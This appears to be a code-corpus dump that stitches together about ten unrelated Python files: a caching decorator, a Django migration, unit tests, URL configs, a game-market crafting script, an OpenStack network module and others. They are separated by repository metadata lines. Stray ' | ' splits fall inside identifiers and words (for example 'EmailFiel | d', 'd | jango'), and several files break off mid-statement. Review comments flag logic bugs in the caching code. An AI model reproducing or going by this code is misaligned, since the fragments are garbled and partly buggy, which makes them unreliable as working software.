                # Cached attributes shadow the instance's own attributes.
                # NOTE(review): 'hasattr' here resolves to the local helper
                # defined below, which tests '__cache__' rather than
                # '__cached__' -- looks inconsistent; confirm.
                if hasattr(self, '__cached__') and key in self.__cached__:
                    return self.__cached__[key]
            return old_getattribute(self, key)
        cls.__getattribute__ = new_getattribute
        old_setattr = cls.__setattr__
        def new_setattr(self, key, value):
            if key != '__cache__':
                if __should_do_queue(self):
                    __do_queue()
                if hasattr(self, '__cached__'):
                    """Only check for updatable cache values
                    when a cache dict exists"""
                    if not hasattr(self, '__cachable_attrs'):
                        self.__dict__['__cachable_attrs'] = \
                            self.__dict__['__cached__'].keys()
                    if key in self.__dict__['__cachable_attrs']:
                        # NOTE(review): this compares the attribute NAME to
                        # the cached VALUE; 'value != ...' was probably
                        # intended -- confirm.
                        if key != self.__dict__['__cached__'][key]:
                            self.__dict__['__cached__'][key] = value
                            __register_update(
                                __make_id(cls, self, id_attribute),
                                self.__cached__)
                            return
            old_setattr(self, key, value)
        cls.__setattr__ = new_setattr
        def hasattr(self, key):
            # Deliberately shadows the builtin hasattr within make_class.
            if __should_do_queue(self):
                __do_queue()
            # NOTE(review): the cache dict is stored as '__cached__'
            # elsewhere; '__cache__' here looks like a typo -- confirm.
            if '__cache__' in self.__dict__:
                if key in self.__dict__['__cache__']:
                    return True
            if key in self.__dict__:
                return True
            return False
        # NOTE(review): Python defines no '__hasattr__' protocol; the
        # interpreter never calls this hook -- confirm it is invoked
        # explicitly somewhere.
        cls.__hasattr__ = hasattr
        return cls
    return make_class
def cache_provider(f):
    """Mark *f* as the data provider for the next @cache_class declaration.

    Returns *f* unchanged so it remains usable as a plain function.
    """
    global __next_provider
    __next_provider = f
    return f
|
InScience/DAMIS-old | src/damis/migrations/0039_auto__chg_field_parametervalue_value.py | Python | agpl-3.0 | 11,165 | 0.007613 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        # Relax 'ParameterValue.value' to accept NULLs (max_length stays 255).
        # Changing field 'ParameterValue.value'
        db.alter_column(u'damis_parametervalue', 'value', self.gf('django.db.models.fields.CharField')(max_length=255, null=True))
    def backwards(self, orm):
        # Revert to NOT NULL; existing NULLs are rewritten to '' via default.
        # Changing field 'ParameterValue.value'
        db.alter_column(u'damis_parametervalue', 'value', self.gf('django.db.models.fields.CharField')(default='', max_length=255))
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailFiel | d', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyTo | ManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'damis.cluster': {
'Meta': {'object_name': 'Cluster'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'workload_url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True'})
},
u'damis.component': {
'Meta': {'object_name': 'Component'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'cluster': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['damis.Cluster']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'description_lt': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'function': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'label_lt': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'wsdl': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'damis.connection': {
'Meta': {'object_name': 'Connection'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'source'", 'null': 'True', 'to': u"orm['damis.ParameterValue']"}),
'target': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'target'", 'null': 'True', 'to': u"orm['damis.ParameterValue']"})
},
u'damis.dataset': {
'Meta': {'object_name': 'Dataset'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'damis.experiment': {
'Meta': {'object_name': 'Experiment'},
'finish': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_calc_time': ('django.db.models.fields.TimeField', [], {'default': "'2:00'", 'null': 'True'}),
'p': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'SAVED'", 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length' |
n9code/calm | tests/test_param.py | Python | mit | 1,276 | 0 | from unittest import TestCase
from calm.param import ParameterJsonType
class CodecTests(TestCase):
    """Checks ParameterJsonType.from_python_type mappings and failure modes."""

    def test_param_json_type(self):
        # Scalar python types map straight onto JSON type names.
        scalar_cases = (
            (int, 'integer'),
            (float, 'number'),
            (str, 'string'),
            (bool, 'boolean'),
        )
        for python_type, json_name in scalar_cases:
            self.assertEqual(
                ParameterJsonType.from_python_type(python_type), json_name)

        # A one-element list denotes a typed JSON array.
        array_type = ParameterJsonType.from_python_type([bool])
        self.assertEqual(array_type, 'array')
        self.assertEqual(array_type.params['items'], 'boolean')

        # Subclasses of supported types resolve to the base mapping.
        class CustomType(str):
            pass
        self.assertEqual(
            ParameterJsonType.from_python_type(CustomType), 'string')

    def test_param_json_type_errors(self):
        # Multi-element lists, nested lists and unsupported types all fail.
        for bad_value in ([int, str], [[int]], tuple):
            self.assertRaises(TypeError,
                              ParameterJsonType.from_python_type,
                              bad_value)
|
luzfcb/django-autocomplete-light | test_project/select2_tagging/urls.py | Python | mit | 295 | 0 | from dal import autocomplete
from d | jango.conf.urls import url
from tagging.models import Tag
# Single test route exposing a Select2 autocomplete over all Tag objects.
urlpatterns = [
    url(
        'test-autocomplete/$',
        autocomplete.Select2QuerySetView.as_view(
            queryset=Tag.objects.all(),
        ),
        name='select2_tagging',
    ),
]
|
xanthics/gw2crafting---retired | Crafting.py | Python | mit | 21,884 | 0.040121 | #!/usr/bin/env python
'''
Copyright (c) 2012 Jeremy Parks ( xanthic.9478 )
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Purpose: Generates a crafting guide based on current market prices
'''
import urllib, json, time, threading, datetime, math
import items_l, name_list
from Queue import Queue
from collections import defaultdict
from ftplib import FTP
# FTP Login
ftp_url = "text"
ftp_user = "goes"
ftp_pass = "here"
# Dictionary of all the items we need prices of
recipeDict = items_l.items
# list of items we compute the cost of that is used by every craft
'''
Dictionary structure
Key: tier(t1,t2,t3,t4,t5)
Key: ore, wood, cloth, leather, bone, claw, fang, scale, totem, venom, blood, ingot, plank, bolt, dowel, plated_dowel, thread, small_haft, large_haft, leather_section, string, lump(sometimes)
name: full name
cost: buy cost or computed make cost
recipe: items to build, or None for base items
'''
items = {}
insigs = {}
total_buy = defaultdict(int)
total_cost = 0
# Store our xp needed to reach each level of crafting
xp_to_level = [0]
#threaded function to get info about an item
class getItem(threading.Thread):
	"""Worker thread fetching one item's market data.

	Queries gw2spidy first, falling back to guildwarstrade on failure;
	callers read the merged result via get_result() after join().
	"""
	def __init__(self,itemid,tier,sub_type,level,name):
		self.url1 = "http://www.gw2spidy.com/api/v0.9/json/item/"
		self.url2 = "http://www.guildwarstrade.com/api/public/item?id="
		self.itemid = itemid
		self.tier = tier
		self.sub_type = sub_type
		self.level = level
		self.nm = name
		self.result = None
		threading.Thread.__init__(self)
	def get_result(self):
		# Annotate the raw API payload with our tier/sub_type bookkeeping.
		self.result['result']['tier'] = self.tier
		self.result['result']['sub_type'] = self.sub_type
		if not self.level == None:
			self.result['result']['level'] = self.level
			# NOTE(review): 'sname' is only set when level is not None --
			# confirm consumers never read it for level-less items.
			self.result['result']['sname'] = self.nm
		return self.result
	# Function for Guildwarstrade prices
	def gwt(self,result,item):
		# Normalise the guildwarstrade payload to the gw2spidy shape.
		f = json.load(result)
		self.result = {}
		self.result['result'] = {}
		self.result['result']['min_sale_unit_price'] = f['sell']
		self.result['result']['name'] = name_list.names[item]
		self.result['result']['data_id'] = item
	def run(self):
		# Retry forever, alternating primary and backup sites.
		while(1):
			try:
				f = urllib.urlopen(self.url1+self.itemid)
				self.result = json.load(f)
				break
			except Exception, err:
				print 'ERROR: %s. Trying backup website.\n' % str(err)#"Error getting url, trying again "+ self.url + self.item
				try:
					f = urllib.urlopen(self.url2+self.itemid)
					self.gwt(f,self.itemid)
					break
				except Exception, err:
					print 'ERROR: %s. Backup website failed.\n' % str(err)#"Error getting url, trying again "+ self.url + self.item
					time.sleep(1)
# Get our item data using threads and a Queue
def getItemDict():
	"""Fetch prices for everything in recipeDict into the module 'items' dict.

	Producer/consumer over a bounded Queue(3) so at most a few getItem
	threads are in flight at once.
	"""
	def producer(q):
		# Spawn one fetch thread per (tier, sub_type) and hand it over.
		for tier in recipeDict:
			for sub_type in recipeDict[tier]:
				thread = getItem(recipeDict[tier][sub_type],tier,sub_type,None,None)
				thread.start()
				q.put(thread,True)
	def consumer(q):
		num = 1
		den = 0
		for tier in recipeDict:
			den += len(recipeDict[tier])
		while num <= den:
			thread = q.get(True)
			thread.join()
			tmp = thread.get_result()
			# Record name/cost and mark as a base (recipe-less) item.
			items.setdefault(tmp['result']['tier'],{})
			items[tmp['result']['tier']].setdefault(tmp['result']['sub_type'],{})
			items[tmp['result']['tier']][tmp['result']['sub_type']]['name'] = tmp['result']['name']
			items[tmp['result']['tier']][tmp['result']['sub_type']]['cost'] = tmp['result']['min_sale_unit_price']
			items[tmp['result']['tier']][tmp['result']['sub_type']]['recipe'] = None
			print str(num) +' of '+ str(den)
			num += 1
	q = Queue(3)
	p_thread = threading.Thread(target=producer, args=(q,))
	c_thread = threading.Thread(target=consumer, args=(q,))
	p_thread.start()
	c_thread.start()
	p_thread.join()
	c_thread.join()
# Get our insignia price data using threads and a Queue
def getInsigDict():
	"""Fetch insignia prices from items_l.insig_list into the 'insigs' dict.

	Same bounded producer/consumer pattern as getItemDict(), one level
	deeper (tier -> sub_type -> level -> name).
	"""
	def producer2(q):
		for tier in items_l.insig_list:
			for sub_type in items_l.insig_list[tier]:
				for level in items_l.insig_list[tier][sub_type]:
					for name in items_l.insig_list[tier][sub_type][level]:
						thread = getItem(items_l.insig_list[tier][sub_type][level][name],tier,sub_type,level,name)
						thread.start()
						q.put(thread,True)
	def consumer2(q):
		num = 1
		den = 0
		for tier in items_l.insig_list:
			for sub_type in items_l.insig_list[tier]:
				for level in items_l.insig_list[tier][sub_type]:
					den += len(items_l.insig_list[tier][sub_type][level])
		while num <= den:
			thread = q.get(True)
			thread.join()
			tmp = thread.get_result()
			tier = tmp['result']['tier']
			sub_type = tmp['result']['sub_type']
			level = tmp['result']['level']
			name = tmp['result']['sname']
			insigs.setdefault(tier,{})
			insigs[tier].setdefault(sub_type,{})
			insigs[tier][sub_type].setdefault(level,{})
			insigs[tier][sub_type][level].setdefault(name,{})
			insigs[tier][sub_type][level][name]['name'] = tmp['result']['name']
			insigs[tier][sub_type][level][name]['cost'] = tmp['result']['min_sale_unit_price']
			insigs[tier][sub_type][level][name]['recipe'] = None
			print str(num) +' of '+ str(den)
			num += 1
	q = Queue(3)
	p_thread = threading.Thread(target=producer2, args=(q,))
	c_thread = threading.Thread(target=consumer2, args=(q,))
	p_thread.start()
	c_thread.start()
	p_thread.join()
	c_thread.join()
# add some costs to the dict
def appendCosts():
items['t1']['thread'] = {'name':'Spool of Jute Thread','cost':8,'recipe':None}
items['t1']['lump'] = {'name':'Lump of Tin','cost':8,'recipe':None}
items['t2']['thread'] = {'name':'Spool of Wool Thread','cost':16,'recipe':None}
items['t3']['thread'] = {'name':'Spool of Cotton Thread','cost':24,'recipe':None}
items['t3']['lump'] = {'name':'Lump of Coal','cost':16,'recipe':None}
items['t4']['thread'] = {'name':'Spool of Linen Thread','cost':32,'recipe':None}
items['t4']['lump'] = {'name':'Lump of Primordium','cost':48,'recipe':None}
items['t5']['thread'] = {'name':'Spool of Silk Thread','cost':48,'recipe':None}
# generate placeholders in items for parts
for tier in items:
for o in ['ingot','plank','bolt','dowel','plated_dowel','leather_section','small_haft','large_haft','string']:
items[tier][o] = {'name':tier+'_'+o,'cost':0,'recipe':items_l.itec[tier][o]}
for t in items[tier][o]['recipe']:
items[tier][o]['cost'] += items[tier][o]['recipe'][t]*items[tier][t]['cost']
items[tier]['insc'] = {'fine1':{},'fine2':{},'master':{}}
items[tier]['insig'] = {'fine1':{},'fine2':{},'master':{}}
if tier == 't5':
items[tier]['insc']['rare'] = {}
items[tier]['insig']['rare'] = {}
for typ in ['insc','insig']:
for stier in items_l.itec[tier][typ]:
for keyv in items_l.itec[tier][typ][stier]:
items[tier][typ][stier][keyv] = {'name':tier+'_'+keyv,'cost':0,'recipe':items_l.itec[tier][typ][stier][keyv]}
for o in items[tier][typ][stier][keyv]['recipe']:
items[tier][typ][stier][keyv]['cost'] += items[tier][typ][stier][keyv]['recipe'][o]*items[tier][o]['cost']
for o in items_l.wc:
items[tier][o] = {'name':tier+'_'+o,'cost':0,'recipe':items_l.wc[o]}
for t in items[tier][o]['recipe']:
items[tier][o]['cost'] += items[tier][o]['recipe'][t]*items[tier][t]['cost']
for o in items_l.ht:
items[tier][o] = {'name':tier+'_'+o,'cost':0,'recipe':items_l.ht[o]}
for t in items[tier][o]['recipe']:
items[tier] |
voidfiles/lark | lark/ext/utils.py | Python | mit | 800 | 0.0025 | import datetime
import json
import random
import string
class RedisApiException(Exception):
    """Exception carrying an HTTP-style status code alongside its message."""

    def __init__(self, message, status_code, *args, **kwargs):
        # Only the message reaches the base Exception; extra args are
        # accepted but ignored, matching the original contract.
        super(RedisApiException, self).__init__(message)
        self.status_code = status_code
class DateTimeJSONEncoder(json.JSONEncoder):
    """JSONEncoder handling datetimes, sets, and objects exposing to_json().

    Conversions:
      - datetime.datetime -> ISO-8601 string
      - set               -> list
      - truthy object with to_json() -> its to_json() result
    Anything else defers to the base class (which raises TypeError).
    """

    def default(self, obj):
        if isinstance(obj, datetime.datetime):
            return obj.isoformat()

        if isinstance(obj, set):
            return list(obj)

        if obj and hasattr(obj, 'to_json'):
            # Bug fix: the original assigned obj = obj.to_json() and then
            # fell through to super().default(obj), which unconditionally
            # raises TypeError even for serializable values. Returning the
            # converted object lets the encoder serialize it normally.
            return obj.to_json()

        return super(DateTimeJSONEncoder, self).default(obj)


# Shared encoder instance used by the rest of the package.
json_dumps = DateTimeJSONEncoder()
def generate_random_string(length=13, chars=string.ascii_letters + string.digits):
    """Return a random string of *length* characters drawn from *chars*.

    NOTE: backed by the non-cryptographic ``random`` module; prefer
    ``secrets`` for security-sensitive tokens.
    """
    picks = [random.choice(chars) for _ in range(length)]
    return ''.join(picks)
|
dtroyer/python-openstacksdk | openstack/cloud/_network.py | Python | apache-2.0 | 104,230 | 0 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either expr | ess or imp | lied.
# See the License for the specific language governing permissions and
# limitations under the License.
# import types so that we can reference ListType in sphinx param declarations.
# We can't just use list, because sphinx gets confused by
# openstack.resource.Resource.list and openstack.resource2.Resource.list
import six
import time
import threading
import types # noqa
from openstack.cloud import exc
from openstack.cloud import _normalize
from openstack.cloud import _utils
from openstack import exceptions
from openstack import proxy
class NetworkCloudMixin(_normalize.Normalizer):
    def __init__(self):
        # Cached port list, populated lazily by list_ports().
        self._ports = None
        # Timestamp of the last port fetch; compared against _PORT_AGE.
        self._ports_time = 0
        # Serialises refreshes of the port cache across threads.
        self._ports_lock = threading.Lock()
    @_utils.cache_on_arguments()
    def _neutron_extensions(self):
        """Return the set of extension aliases advertised by neutron (cached)."""
        extensions = set()
        resp = self.network.get('/extensions.json')
        data = proxy._json_response(
            resp,
            error_message="Error fetching extension list for neutron")
        for extension in self._get_and_munchify('extensions', data):
            extensions.add(extension['alias'])
        return extensions
    def _has_neutron_extension(self, extension_alias):
        """Return True when neutron advertises *extension_alias*."""
        return extension_alias in self._neutron_extensions()
def search_networks(self, name_or_id=None, filters=None):
"""Search networks
:param name_or_id: Name or ID of the desired network.
:param filters: a dict containing additional filters to use. e.g.
{'router:external': True}
:returns: a list of ``munch.Munch`` containing the network description.
:raises: ``OpenStackCloudException`` if something goes wrong during the
OpenStack API call.
"""
networks = self.list_networks(
filters if isinstance(filters, dict) else None)
return _utils._filter_list(networks, name_or_id, filters)
def search_routers(self, name_or_id=None, filters=None):
"""Search routers
:param name_or_id: Name or ID of the desired router.
:param filters: a dict containing additional filters to use. e.g.
{'admin_state_up': True}
:returns: a list of ``munch.Munch`` containing the router description.
:raises: ``OpenStackCloudException`` if something goes wrong during the
OpenStack API call.
"""
routers = self.list_routers(
filters if isinstance(filters, dict) else None)
return _utils._filter_list(routers, name_or_id, filters)
def search_subnets(self, name_or_id=None, filters=None):
"""Search subnets
:param name_or_id: Name or ID of the desired subnet.
:param filters: a dict containing additional filters to use. e.g.
{'enable_dhcp': True}
:returns: a list of ``munch.Munch`` containing the subnet description.
:raises: ``OpenStackCloudException`` if something goes wrong during the
OpenStack API call.
"""
subnets = self.list_subnets(
filters if isinstance(filters, dict) else None)
return _utils._filter_list(subnets, name_or_id, filters)
    def search_ports(self, name_or_id=None, filters=None):
        """Search ports
        :param name_or_id: Name or ID of the desired port.
        :param filters: a dict containing additional filters to use. e.g.
                {'device_id': '2711c67a-b4a7-43dd-ace7-6187b791c3f0'}
        :returns: a list of ``munch.Munch`` containing the port description.
        :raises: ``OpenStackCloudException`` if something goes wrong during the
            OpenStack API call.
        """
        # If port caching is enabled, do not push the filter down to
        # neutron; get all the ports (potentially from the cache) and
        # filter locally.
        # NOTE(review): str filters (jmespath expressions) can never be
        # pushed down, hence the isinstance check -- confirm.
        if self._PORT_AGE or isinstance(filters, str):
            pushdown_filters = None
        else:
            pushdown_filters = filters
        ports = self.list_ports(pushdown_filters)
        # Local filtering still applies the full filters argument.
        return _utils._filter_list(ports, name_or_id, filters)
    def list_networks(self, filters=None):
        """List all available networks.
        :param filters: (optional) dict of filter conditions to push down
        :returns: A list of ``munch.Munch`` containing network info.
        """
        # If the cloud is running nova-network, just return an empty list.
        if not self.has_service('network'):
            return []
        # Translate None from search interface to empty {} for kwargs below
        if not filters:
            filters = {}
        # NOTE(review): unlike list_routers, the response is not run through
        # proxy._json_response error handling -- confirm this is intended.
        data = self.network.get("/networks.json", params=filters)
        return self._get_and_munchify('networks', data)
    def list_routers(self, filters=None):
        """List all available routers.
        :param filters: (optional) dict of filter conditions to push down
        :returns: A list of router ``munch.Munch``.
        """
        # If the cloud is running nova-network, just return an empty list.
        if not self.has_service('network'):
            return []
        # Translate None from search interface to empty {} for kwargs below
        if not filters:
            filters = {}
        resp = self.network.get("/routers.json", params=filters)
        data = proxy._json_response(
            resp,
            error_message="Error fetching router list")
        return self._get_and_munchify('routers', data)
    def list_subnets(self, filters=None):
        """List all available subnets.
        :param filters: (optional) dict of filter conditions to push down
        :returns: A list of subnet ``munch.Munch``.
        """
        # If the cloud is running nova-network, just return an empty list.
        if not self.has_service('network'):
            return []
        # Translate None from search interface to empty {} for kwargs below
        if not filters:
            filters = {}
        data = self.network.get("/subnets.json", params=filters)
        return self._get_and_munchify('subnets', data)
    def list_ports(self, filters=None):
        """List all available ports.
        :param filters: (optional) dict of filter conditions to push down
        :returns: A list of port ``munch.Munch``.
        """
        # If pushdown filters are specified and we do not have batched caching
        # enabled, bypass local caching and push down the filters.
        if filters and self._PORT_AGE == 0:
            return self._list_ports(filters)
        if (time.time() - self._ports_time) >= self._PORT_AGE:
            # Since we're using cached data anyway, we don't need to
            # have more than one thread actually submit the list
            # ports task. Let the first one submit it while holding
            # a lock, and the non-blocking acquire method will cause
            # subsequent threads to just skip this and use the old
            # data until it succeeds.
            # Initially when we never got data, block to retrieve some data.
            first_run = self._ports is None
            if self._ports_lock.acquire(first_run):
                try:
                    # NOTE(review): this condition re-checks _ports under the
                    # lock so a blocked first_run caller skips a redundant
                    # refetch if another thread already populated the cache
                    # -- confirm that reading of the intent.
                    if not (first_run and self._ports is not None):
                        self._ports = self._list_ports({})
                        self._ports_time = time.time()
                finally:
                    self._ports_lock.release()
        # Wrap the return with filter_list so that if filters were passed
        # but we were batching/caching and thus always fetching the whole
        # list from the cloud, we still return a filtered list.
        return _utils._filter_list(self._ports, None, filters or {})
def _list_ports(self, filters):
# If the cloud is run |
SkippsDev/Py-Slither | src/packet/BufferTypes.py | Python | mit | 442 | 0.002262 | import struct
# Pre-compiled little-endian struct codecs, one per wire type.
boolean = struct.Struct("<?")
uint8 = struct.Struct("<B")
uint16 = struct.Struct("<H")
uint32 = struct.Struct("<I")
uint64 = struct.Struct("<Q")
int8 = struct.Struct("<b")
int16 = struct.Struct("<h")
# NOTE(review): "<L" is a 4-byte *unsigned* long, not a signed 24-bit int;
# the 'int24' name looks wrong -- confirm against the protocol spec.
int24 = struct.Struct("<L")
int32 = struct.Struct("<i")
int64 = struct.Struct("<q")
float32 = struct.Struct("<f")
float64 = struct.Struct("<d")
# NOTE(review): "<s" packs exactly one byte; variable-length strings need a
# runtime-built '<Ns' format -- confirm how this codec is used.
string = struct.Struct("<s")
# Flatbuffer-style offset aliases.
uoffset = uint32
soffset = int32
voffset = uint16
anhstudios/swganh | data/scripts/templates/object/tangible/ship/components/weapon/shared_wpn_rss_imperial_cannon.py | Python | mit | 491 | 0.044807 | #### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.obj | ect import *
def create(kernel):
	"""Build the RSS imperial cannon ship-component template object."""
	result = Tangible()
	result.template = "object/tangible/ship/components/weapon/shared_wpn_rss_imperial_cannon.iff"
	result.attribute_template_id = 8
	result.stfName("space/space_item","wpn_rss_imperial_cannon_n")
	#### BEGIN MODIFICATIONS ####
	#### END MODIFICATIONS ####
	return result
kscharding/integral-solutions-smxq | codereview/urls.py | Python | apache-2.0 | 3,897 | 0.00077 | # Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, sof | tware
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, eith | er express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""URL mappings for the codereview package."""
# NOTE: Must import *, since Django looks for things here, e.g. handler500.
from django.conf.urls.defaults import *
import django.views.defaults
from codereview import feeds
# Route table for the codereview app; all view names resolve inside
# 'codereview.views' unless given as dotted paths.
urlpatterns = patterns(
    'codereview.views',
    (r'^$', 'index'),
    (r'^all$', 'all'),
    (r'^mine$', 'mine'),
    (r'^starred$', 'starred'),
    (r'^new$', 'new'),
    (r'^upload$', 'upload'),
    (r'^(\d+)$', 'show', {}, 'show_bare_issue_number'),
    (r'^(\d+)/(show)?$', 'show'),
    (r'^(\d+)/add$', 'add'),
    (r'^(\d+)/edit$', 'edit'),
    (r'^(\d+)/delete$', 'delete'),
    (r'^(\d+)/close$', 'close'),
    (r'^(\d+)/mail$', 'mailissue'),
    (r'^(\d+)/publish$', 'publish'),
    (r'^download/issue(\d+)_(\d+)\.diff', 'download'),
    (r'^download/issue(\d+)_(\d+)_(\d+)\.diff', 'download_patch'),
    (r'^(\d+)/patch/(\d+)/(\d+)$', 'patch'),
    (r'^(\d+)/image/(\d+)/(\d+)/(\d+)$', 'image'),
    (r'^(\d+)/diff/(\d+)/(.+)$', 'diff'),
    (r'^(\d+)/diff2/(\d+):(\d+)/(.+)$', 'diff2'),
    (r'^(\d+)/diff_skipped_lines/(\d+)/(\d+)/(\d+)/(\d+)/([tba])/(\d+)$',
     'diff_skipped_lines'),
    (r'^(\d+)/diff_skipped_lines/(\d+)/(\d+)/$',
     django.views.defaults.page_not_found, {}, 'diff_skipped_lines_prefix'),
    (r'^(\d+)/diff2_skipped_lines/(\d+):(\d+)/(\d+)/(\d+)/(\d+)/([tba])/(\d+)$',
     'diff2_skipped_lines'),
    (r'^(\d+)/diff2_skipped_lines/(\d+):(\d+)/(\d+)/$',
     django.views.defaults.page_not_found, {}, 'diff2_skipped_lines_prefix'),
    (r'^(\d+)/upload_content/(\d+)/(\d+)$', 'upload_content'),
    (r'^(\d+)/upload_patch/(\d+)$', 'upload_patch'),
    (r'^(\d+)/upload_complete/(\d+)?$', 'upload_complete'),
    (r'^(\d+)/description$', 'description'),
    (r'^(\d+)/fields', 'fields'),
    (r'^(\d+)/star$', 'star'),
